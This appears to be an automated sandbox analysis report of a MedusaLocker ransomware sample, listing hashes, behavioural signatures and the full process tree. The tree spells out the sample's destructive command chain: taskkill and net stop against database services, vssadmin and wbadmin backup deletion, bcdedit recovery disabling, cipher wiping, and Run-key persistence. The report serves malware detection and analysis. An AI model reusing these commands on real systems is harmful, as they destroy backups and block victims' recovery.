Analysis

max time kernel: 149s
max time network: 135s
platform: windows7_x64
resource: win7-20240708-en
resource tags: arch:x64, arch:x86, image:win7-20240708-en, locale:en-us, os:windows7-x64, system
submitted: 14-08-2024 11:01

Static task: static1

Behavioral task: behavioral1
Sample: ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe
Resource: win7-20240708-en

Behavioral task: behavioral2
Sample: ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe
Resource: win10v2004-20240802-en
General

Target: ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe
Size: 422KB
MD5: f736ee661d70a5d7aa322f017e04b1d2
SHA1: eee99e6b7c58ecc95c75cd52eb7ac02d812c1a54
SHA256: ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679
SHA512: 23ff1b49955354a9a882ca2fd884157f75d937f00be2928acebab2a01fddcd018159cfd85df0e890cb2ecc0e40e6a02be926db29418928b320517ea6b538c8b8
SSDEEP: 6144:MTqhlztbElkd+s0zyykmkkES0J2txMLVesCjuwptsOXNZcX9PNCFR09KKPOeFhbb:RhDdkybr/J2tx2VeFusZXQJhkeFhbb

Malware Config

Extracted
Path: C:\How_to_back_files.html
Family: medusalocker
Signatures

MedusaLocker
Ransomware with several variants first seen in September 2019.

Suspicious use of NtCreateUserProcessOtherParentProcess (1 IoCs)
description | pid | Process | procid_target
PID 2068 created 1196 | 2068 | ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe | 21

Deletes shadow copies (3 TTPs)
Ransomware often targets backup files to inhibit system recovery.

Modifies boot configuration data using bcdedit (1 TTPs, 2 IoCs)
pid | Process
1912 | bcdedit.exe
1908 | bcdedit.exe

Renames multiple (186) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.

pid | Process
2760 | wbadmin.exe

pid | Process
1884 | wbadmin.exe

Adds Run key to start application (2 TTPs, 2 IoCs)
description | ioc | Process
Set value (str) | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\BabyLockerKZ = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe\"" | ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\BabyLockerKZ = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe\"" | ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe
Enumerates connected drives (3 TTPs, 26 IoCs)
Attempts to read the root path of hard drives other than the default C: drive.
description | ioc | Process
File opened (read-only) | \??\A:, \??\B:, \??\E:, \??\F:, \??\G:, \??\H:, \??\I:, \??\J:, \??\K:, \??\L:, \??\M:, \??\N:, \??\O:, \??\P:, \??\Q:, \??\R:, \??\S:, \??\T:, \??\U:, \??\V:, \??\W:, \??\X:, \??\Y:, \??\Z: (24 entries, every letter except C: and D:) | ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe
File opened (read-only) | \??\A:, \??\F: (2 entries) | cipher.exe

Drops file in Windows directory (3 IoCs)
description | ioc | Process
File opened for modification | C:\Windows\Logs\WindowsBackup\Wbadmin.1.etl | wbadmin.exe
File opened for modification | C:\Windows\Logs\WindowsBackup\Wbadmin.3.etl | wbadmin.exe
File opened for modification | C:\Windows\Logs\WindowsBackup\Wbadmin.2.etl | wbadmin.exe
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).

System Location Discovery: System Language Discovery (1 TTPs, 31 IoCs)
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe (30 entries)
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | IEXPLORE.EXE (1 entry)
Interacts with shadow copies (3 TTPs, 1 IoCs)
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid | Process
2264 | vssadmin.exe

Kills process with taskkill (14 IoCs)
pid | Process
1032 | taskkill.exe
2620 | taskkill.exe
1224 | taskkill.exe
2040 | taskkill.exe
620 | taskkill.exe
2072 | taskkill.exe
1800 | taskkill.exe
2824 | taskkill.exe
2924 | taskkill.exe
3032 | taskkill.exe
2960 | taskkill.exe
2084 | taskkill.exe
2248 | taskkill.exe
2292 | taskkill.exe
description | ioc | Process
(in the ioc column below, IE stands for \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer)
Key created | IE\Main | iexplore.exe
Key created | IE\LowRegistry\DontShowMeThisDialogAgain | iexplore.exe
Key created | IE\GPU | iexplore.exe
Key created | IE\Recovery\PendingRecovery | iexplore.exe
Set value (int) | IE\Recovery\PendingRecovery\AdminActive = "0" | iexplore.exe
Set value (int) | IE\DomainSuggestion\NextUpdateDate = "429795247" | iexplore.exe
Key created | IE\PageSetup | iexplore.exe
Key created | IE\Recovery\AdminActive | iexplore.exe
Set value (str) | IE\Main\WindowsSearch\Version = "WS not running" | iexplore.exe
Set value (str) | IE\Main\WindowsSearch\Version = "WS not running" | IEXPLORE.EXE
Key created | IE\TabbedBrowsing\NewTabPage | iexplore.exe
Key created | IE\Toolbar | IEXPLORE.EXE
Set value (int) | IE\Recovery\AdminActive\{AED1CA61-5A2C-11EF-8995-CA26F3F7E98A} = "0" | iexplore.exe
Key created | IE\Main\WindowsSearch | iexplore.exe
Key created | IE\Main\WindowsSearch | IEXPLORE.EXE
Set value (int) | IE\SearchScopes\DownloadRetries = "2" | iexplore.exe
Set value (data) | IE\TabbedBrowsing\NewTabPage\LastProcessed = 901e3c8439eeda01 | iexplore.exe
Set value (data) | IE\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | iexplore.exe
Set value (data) | IE\TabbedBrowsing\NewTabPage\MFV = [value removed in extraction] | iexplore.exe
Key created | IE\Zoom | iexplore.exe
Set value (str) | IE\Main\FullScreen = "no" | iexplore.exe
Key created | IE\IntelliForms | iexplore.exe
Key created | IE\InternetRegistry | iexplore.exe
Key created | IE\LowRegistry | iexplore.exe
Key created | IE\LowRegistry\DOMStorage | iexplore.exe
Key created | IE\Toolbar | iexplore.exe
Key created | IE\Toolbar\WebBrowser | iexplore.exe
Set value (int) | IE\Main\CompatibilityFlags = "0" | iexplore.exe
Set value (int) | IE\Recovery\PendingRecovery\AdminActive = "1" | iexplore.exe
Key created | IE\Main | IEXPLORE.EXE
Set value (data) | IE\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000062974e5b5f804e45b98349be16bffb78000000000200000000001066000000010000200000006ca3f8120368654d859806efaf983809a170fcc37fbb6c22a4ff1737ed0872ad000000000e800000000200002000000076f13718682defb4ac4792ea051c0eeadd5f068d91b86f354c756cf0aade40af200000009e21b96c1a4a9fee178333dea0fbacb1977883348952277183ba389684ae96e140000000c742dd6b00e42651785a0267a1edac15f1ddd7eb54b41626e049285afcc4ff79a3b790ce86efbf3717c23471716d593e2ca5fa563221c64df20596587e8c030d | iexplore.exe
Key created | IE\DomainSuggestion | iexplore.exe
Key created | IE\BrowserEmulation\LowMic | iexplore.exe
Key created | IE\IETld\LowMic | iexplore.exe
Key created | IE\SearchScopes | iexplore.exe
Key created | IE\TabbedBrowsing | iexplore.exe
Set value (int) | IE\TabbedBrowsing\NTPFirstRun = "1" | iexplore.exe
Modifies registry class (5 IoCs)
description | ioc | Process
Key created | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000_Classes\Local Settings | IEXPLORE.EXE
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WINWORD.EXE | IEXPLORE.EXE
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mhtml\OpenWithList\WINWORD.EXE | IEXPLORE.EXE
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mhtml | IEXPLORE.EXE
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mhtml\OpenWithList | IEXPLORE.EXE

Runs net.exe
Suspicious behavior: EnumeratesProcesses (64 IoCs)
pid | Process
2068 | ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe (64 identical entries)
Suspicious use of AdjustPrivilegeToken (35 IoCs)
description | pid | Process
Token: SeDebugPrivilege | 2248, 2924, 3032, 2620, 1224, 2040, 2960, 620, 2072, 2084, 1032, 2292 (one entry per pid, 12 entries) | taskkill.exe
Token: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35 (one entry per token, 20 entries) | 3004 | WMIC.exe
Token: SeBackupPrivilege, SeRestorePrivilege, SeAuditPrivilege (one entry per token, 3 entries) | 2632 | vssvc.exe

Suspicious use of FindShellTrayWindow (1 IoCs)
pid | Process
1932 | iexplore.exe

Suspicious use of SetWindowsHookEx (6 IoCs)
pid | Process
1932 | iexplore.exe (2 entries)
760 | IEXPLORE.EXE (4 entries)
Suspicious use of WriteProcessMemory (64 IoCs)
description | pid | Process | procid_target
PID 2068 wrote to memory of 264 | 2068 | ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe | 31 (4 entries)
PID 264 wrote to memory of 3060 | 264 | cmd.exe | 33 (4 entries)
PID 2068 wrote to memory of 1428 | 2068 | ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe | 34 (4 entries)
PID 1428 wrote to memory of 2928 | 1428 | cmd.exe | 36 (4 entries)
PID 2928 wrote to memory of 2248 | 2928 | cmd.exe | 37 (3 entries)
PID 2068 wrote to memory of 2836 | 2068 | ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe | 39 (4 entries)
PID 2836 wrote to memory of 2912 | 2836 | cmd.exe | 41 (4 entries)
PID 2912 wrote to memory of 2824 | 2912 | cmd.exe | 42 (3 entries)
PID 2068 wrote to memory of 2776 | 2068 | ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe | 43 (4 entries)
PID 2776 wrote to memory of 2760 | 2776 | cmd.exe | 45 (4 entries)
PID 2760 wrote to memory of 2924 | 2760 | cmd.exe | 46 (3 entries)
PID 2068 wrote to memory of 2788 | 2068 | ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe | 47 (4 entries)
PID 2788 wrote to memory of 3040 | 2788 | cmd.exe | 49 (4 entries)
PID 3040 wrote to memory of 3032 | 3040 | cmd.exe | 50 (3 entries)
PID 2068 wrote to memory of 2792 | 2068 | ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe | 51 (4 entries)
PID 2792 wrote to memory of 1104 | 2792 | cmd.exe | 53 (4 entries)
PID 1104 wrote to memory of 2620 | 1104 | cmd.exe | 54 (3 entries)
PID 2068 wrote to memory of 2696 | 2068 | ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe | 55 (1 entry)
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
(indented entries are children of the entry above them; signatures triggered by a process are listed under it)

C:\Windows\Explorer.EXE
  command line: C:\Windows\Explorer.EXE
  PID: 1196

  C:\Users\Admin\AppData\Local\Temp\ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe
    command line: "C:\Users\Admin\AppData\Local\Temp\ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe"
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Adds Run key to start application
    - Enumerates connected drives
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID: 2068

    C:\Windows\SysWOW64\cmd.exe
      command line: \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c rem Kill "SQL"
      - System Location Discovery: System Language Discovery
      - Suspicious use of WriteProcessMemory
      PID: 264

      C:\Windows\system32\cmd.exe
        command line: C:\Windows\sysnative\cmd.exe /c rem Kill "SQL"
        PID: 3060

    C:\Windows\SysWOW64\cmd.exe
      command line: \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlbrowser.exe
      - System Location Discovery: System Language Discovery
      - Suspicious use of WriteProcessMemory
      PID: 1428

      C:\Windows\system32\cmd.exe
        command line: C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlbrowser.exe
        - Suspicious use of WriteProcessMemory
        PID: 2928

        C:\Windows\system32\taskkill.exe
          command line: taskkill -f -im sqlbrowser.exe
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken
          PID: 2248

    C:\Windows\SysWOW64\cmd.exe
      command line: \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sql writer.exe
      - System Location Discovery: System Language Discovery
      - Suspicious use of WriteProcessMemory
      PID: 2836

      C:\Windows\system32\cmd.exe
        command line: C:\Windows\sysnative\cmd.exe /c taskkill -f -im sql writer.exe
        - Suspicious use of WriteProcessMemory
        PID: 2912

        C:\Windows\system32\taskkill.exe
          command line: taskkill -f -im sql writer.exe
          - Kills process with taskkill
          PID: 2824

    C:\Windows\SysWOW64\cmd.exe
      command line: \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlserv.exe
      - System Location Discovery: System Language Discovery
      - Suspicious use of WriteProcessMemory
      PID: 2776

      C:\Windows\system32\cmd.exe
        command line: C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlserv.exe
        - Suspicious use of WriteProcessMemory
        PID: 2760

        C:\Windows\system32\taskkill.exe
          command line: taskkill -f -im sqlserv.exe
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken
          PID: 2924

    C:\Windows\SysWOW64\cmd.exe
      command line: \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im msmdsrv.exe
      - System Location Discovery: System Language Discovery
      - Suspicious use of WriteProcessMemory
      PID: 2788

      C:\Windows\system32\cmd.exe
        command line: C:\Windows\sysnative\cmd.exe /c taskkill -f -im msmdsrv.exe
        - Suspicious use of WriteProcessMemory
        PID: 3040

        C:\Windows\system32\taskkill.exe
          command line: taskkill -f -im msmdsrv.exe
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken
          PID: 3032

    C:\Windows\SysWOW64\cmd.exe
      command line: \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im MsDtsSrvr.exe
      - System Location Discovery: System Language Discovery
      - Suspicious use of WriteProcessMemory
      PID: 2792

      C:\Windows\system32\cmd.exe
        command line: C:\Windows\sysnative\cmd.exe /c taskkill -f -im MsDtsSrvr.exe
        - Suspicious use of WriteProcessMemory
        PID: 1104

        C:\Windows\system32\taskkill.exe
          command line: taskkill -f -im MsDtsSrvr.exe
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken
          PID: 2620

    C:\Windows\SysWOW64\cmd.exe
      command line: \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlceip.exe
      - System Location Discovery: System Language Discovery
      PID: 2696

      C:\Windows\system32\cmd.exe
        command line: C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlceip.exe
        PID: 2384

        C:\Windows\system32\taskkill.exe
          command line: taskkill -f -im sqlceip.exe
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken
          PID: 1224

    C:\Windows\SysWOW64\cmd.exe
      command line: \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe
      - System Location Discovery: System Language Discovery
      PID: 1948

      C:\Windows\system32\cmd.exe
        command line: C:\Windows\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe
        PID: 2892

        C:\Windows\system32\taskkill.exe
          command line: taskkill -f -im fdlauncher.exe
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken
          PID: 2040

    C:\Windows\SysWOW64\cmd.exe
      command line: \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im Ssms.exe
      - System Location Discovery: System Language Discovery
      PID: 1772

      C:\Windows\system32\cmd.exe
        command line: C:\Windows\sysnative\cmd.exe /c taskkill -f -im Ssms.exe
        PID: 1272

        C:\Windows\system32\taskkill.exe
          command line: taskkill -f -im Ssms.exe
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken
          PID: 2960

    C:\Windows\SysWOW64\cmd.exe
      command line: \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im SQLAGENT.EXE
      - System Location Discovery: System Language Discovery
      PID: 1752

      C:\Windows\system32\cmd.exe
        command line: C:\Windows\sysnative\cmd.exe /c taskkill -f -im SQLAGENT.EXE
        PID: 1192

        C:\Windows\system32\taskkill.exe
          command line: taskkill -f -im SQLAGENT.EXE
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken
          PID: 620

    C:\Windows\SysWOW64\cmd.exe
      command line: \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdhost.exe
      - System Location Discovery: System Language Discovery
      PID: 288

      C:\Windows\system32\cmd.exe
        command line: C:\Windows\sysnative\cmd.exe /c taskkill -f -im fdhost.exe
        PID: 1964

        C:\Windows\system32\taskkill.exe
          command line: taskkill -f -im fdhost.exe
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken
          PID: 2072

    C:\Windows\SysWOW64\cmd.exe
      command line: \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im ReportingServicesService.exe
      - System Location Discovery: System Language Discovery
      PID: 2512

      C:\Windows\system32\cmd.exe
        command line: C:\Windows\sysnative\cmd.exe /c taskkill -f -im ReportingServicesService.exe
        PID: 1668

        C:\Windows\system32\taskkill.exe
          command line: taskkill -f -im ReportingServicesService.exe
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken
          PID: 2084

    C:\Windows\SysWOW64\cmd.exe
      command line: \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im msftesql.exe
      - System Location Discovery: System Language Discovery
      PID: 1252

      C:\Windows\system32\cmd.exe
        command line: C:\Windows\sysnative\cmd.exe /c taskkill -f -im msftesql.exe
        PID: 1904

        C:\Windows\system32\taskkill.exe
          command line: taskkill -f -im msftesql.exe
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken
          PID: 1032

    C:\Windows\SysWOW64\cmd.exe
      command line: \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im pg_ctl.exe
      - System Location Discovery: System Language Discovery
      PID: 1624

      C:\Windows\system32\cmd.exe
        command line: C:\Windows\sysnative\cmd.exe /c taskkill -f -im pg_ctl.exe
        PID: 2804
-
C:\Windows\system32\taskkill.exetaskkill -f -im pg_ctl.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2292
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -impostgres.exe3⤵
- System Location Discovery: System Language Discovery
PID:1312 -
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -impostgres.exe4⤵PID:1548
-
C:\Windows\system32\taskkill.exetaskkill -f -impostgres.exe5⤵
- Kills process with taskkill
PID:1800
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQLServerADHelper1003⤵
- System Location Discovery: System Language Discovery
PID:1932 -
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c net stop MSSQLServerADHelper1004⤵PID:872
-
C:\Windows\system32\net.exenet stop MSSQLServerADHelper1005⤵PID:1860
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLServerADHelper1006⤵PID:1644
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQL$ISARS3⤵
- System Location Discovery: System Language Discovery
PID:2392 -
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c net stop MSSQL$ISARS4⤵PID:1980
-
C:\Windows\system32\net.exenet stop MSSQL$ISARS5⤵PID:2488
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$ISARS6⤵PID:848
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQL$MSFW3⤵
- System Location Discovery: System Language Discovery
PID:1016 -
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c net stop MSSQL$MSFW4⤵PID:1472
-
C:\Windows\system32\net.exenet stop MSSQL$MSFW5⤵PID:2164
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$MSFW6⤵PID:2456
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLAgent$ISARS3⤵
- System Location Discovery: System Language Discovery
PID:2484 -
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c net stop SQLAgent$ISARS4⤵PID:1712
-
C:\Windows\system32\net.exenet stop SQLAgent$ISARS5⤵PID:2156
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$ISARS6⤵PID:2404
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLAgent$MSFW3⤵
- System Location Discovery: System Language Discovery
PID:2280 -
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c net stop SQLAgent$MSFW4⤵PID:2424
-
C:\Windows\system32\net.exenet stop SQLAgent$MSFW5⤵PID:1700
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$MSFW6⤵PID:1660
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLBrowser3⤵
- System Location Discovery: System Language Discovery
PID:1000 -
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c net stop SQLBrowser4⤵PID:2116
-
C:\Windows\system32\net.exenet stop SQLBrowser5⤵PID:804
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLBrowser6⤵PID:680
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop REportServer$ISARS3⤵
- System Location Discovery: System Language Discovery
PID:2124 -
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c net stop REportServer$ISARS4⤵PID:1804
-
C:\Windows\system32\net.exenet stop REportServer$ISARS5⤵PID:888
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop REportServer$ISARS6⤵PID:1260
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLWriter3⤵
- System Location Discovery: System Language Discovery
PID:2036 -
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c net stop SQLWriter4⤵PID:2364
-
C:\Windows\system32\net.exenet stop SQLWriter5⤵PID:2444
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLWriter6⤵PID:1520
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet3⤵
- System Location Discovery: System Language Discovery
PID:2192 -
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet4⤵PID:2644
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /All /Quiet5⤵
- Interacts with shadow copies
PID:2264
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin delete backup -keepVersion:0 -quiet3⤵
- System Location Discovery: System Language Discovery
PID:1656 -
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c wbadmin delete backup -keepVersion:0 -quiet4⤵PID:2744
-
C:\Windows\system32\wbadmin.exewbadmin delete backup -keepVersion:0 -quiet5⤵
- Deletes system backups
PID:1884
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP3⤵
- System Location Discovery: System Language Discovery
PID:1504 -
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP4⤵PID:3056
-
C:\Windows\system32\wbadmin.exewbadmin DELETE SYSTEMSTATEBACKUP5⤵
- Deletes System State backups
- Drops file in Windows directory
PID:2760
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTABACKUP -deleteOldest3⤵
- System Location Discovery: System Language Discovery
PID:1996 -
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTABACKUP -deleteOldest4⤵PID:2916
-
C:\Windows\system32\wbadmin.exewbadmin DELETE SYSTEMSTABACKUP -deleteOldest5⤵PID:1128
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wmic.exe SHADOWCOPY /nointeractive3⤵
- System Location Discovery: System Language Discovery
PID:3060 -
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c wmic.exe SHADOWCOPY /nointeractive4⤵PID:2840
-
C:\Windows\System32\Wbem\WMIC.exewmic.exe SHADOWCOPY /nointeractive5⤵
- Suspicious use of AdjustPrivilegeToken
PID:3004
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c bcdedit.exe /set {default} recoverynabled No3⤵
- System Location Discovery: System Language Discovery
PID:2708 -
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c bcdedit.exe /set {default} recoverynabled No4⤵PID:2496
-
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} recoverynabled No5⤵
- Modifies boot configuration data using bcdedit
PID:1912
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures3⤵
- System Location Discovery: System Language Discovery
PID:1940 -
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures4⤵PID:2836
-
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures5⤵
- Modifies boot configuration data using bcdedit
PID:1908
-
-
-
-
C:\Windows\system32\cipher.execipher /w:\\?\A:3⤵
- Enumerates connected drives
PID:3008
-
-
C:\Windows\system32\cipher.execipher /w:\\?\C:3⤵PID:1124
-
-
C:\Windows\system32\cipher.execipher /w:\\?\F:3⤵
- Enumerates connected drives
PID:2628
-
-
-
C:\Users\Admin\AppData\Local\Temp\ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe\\?\C:\Users\Admin\AppData\Local\Temp\ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe -network2⤵
- Adds Run key to start application
PID:2824
-
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe"2⤵PID:792
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" C:\How_to_back_files.html2⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:1932 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1932 CREDAT:275457 /prefetch:23⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Modifies registry class
